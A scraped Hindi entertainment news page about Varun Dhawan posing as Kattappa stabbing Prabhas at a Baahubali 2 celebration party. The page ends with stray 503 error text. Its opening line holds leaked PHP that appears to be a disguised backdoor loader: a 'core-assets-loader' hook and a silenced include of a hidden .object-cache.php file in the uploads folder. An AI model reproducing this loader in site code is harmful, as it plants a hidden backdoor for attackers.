add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); जब ‘बाहुबली’ प्रभास के मारने के लिए ‘कटप्पा’ बन गए वरूण धवन, देखें PIC – SOCH INDIA
Menu

मनोरंजन
जब ‘बाहुबली’ प्रभास के मारने के लिए ‘कटप्पा’ बन गए वरूण धवन, देखें PIC

nobanner

‘बाहुबली 2’ ने बॉक्स ऑफिस पर धमाकेदार कमाई की है और इस फिल्म के सिनेमाघरों में 50 दिन पूरे हो गए हैं. अभी भी ये फिल्म 1050 सिनेमाघरों में चल रही है. इसी खुशी में बॉलीवुड के जाने माने डायरेक्टर करन जौहर ने सोमवार रात अपने घर पर एक पार्टी का आयोजन किया जिसमें प्रभास और राना दग्गुबत्ती ने आलिया भट्ट, रनबीर कपूर सहित कई बड़े सितारों के साथ पार्टी की.

इस पार्टी में अभिनेता वरूण धवन भी पहुंचे थे. उन्होंने पार्टी के बाद एक तस्वीर इंस्टाग्राम पर शेयर की जिसमें वो बाहुबली यानि प्रभास की पीठ में तलवार घोंपते नज़र आ रहे हैं. इसे शेयर करते हुए वरूण धवन ने लिखा, ‘इस दुनिया में सिर्फ दो लोग ऐसा काम करने का इतिहास रच सकते हैं. एक कटप्पा है और दूसरा मैं…. प्रभास बहुत ही कूल हैं, भगवान उन्हें और जिंदगी में और भी अच्छा करने की शक्ति दे.’

आपको बता दें कि ये तस्वीर आपको बाहुबली 2 के उस सीन की याद दिलाता है जिसमें कटप्पा ने बाहुबली को मार दिया था. ‘बाहुबली: द बिगनिंग’ देखने के बाद पूरे एक साल दर्शकों ने ये जानने के लिए इंतजार किया कि आखिर कटप्पा ने बाहुबली को क्यों मारा. अब वरूण धवन ने मजाकिया अंदाज में ये तस्वीर शेयर कर उसी समय की याद दिला दी है.

बता दें कि ये फिल्म इस फिल्म के रिलीज के 50 दिन पूरे हो गए हैं और ये फिल्म अब भी सिनेमाघरों में चल रही है और अच्छई कमाई भी कर रही है.

इस फिल्म ने वर्ल्डवाइड करीब 1690 करोड़ का आंकड़ा पार कर लिया है. इस फिल्म के हिंदी वर्जन ने भी कमाई का नया रिकॉर्ड बनाया है. हिंदी वर्जन ने बॉक्स ऑफिस 500 करोड़ से ज्यादा की कमाई कर चुकी है जो अब तक किसी भी बड़े स्टार की फिल्म नई कर पाई है.

कल इसी खुशी में पार्टी रखी गई जिसमें आलिया भट्ट, सिद्धार्थ मल्होत्रा और रनबीर कपूर जैसे कई सितारे पहुंचे

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.